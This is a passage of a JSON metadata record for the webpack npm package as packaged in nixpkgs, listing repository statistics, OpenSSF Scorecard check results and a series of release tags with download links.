nixpkgs.nodePackages.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/node-packages/node-packages.nix#L97195","metadata":{"nix_attribute":"webpack-5.90.3","position":"pkgs/development/node-packages/node-packages.nix:97195","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G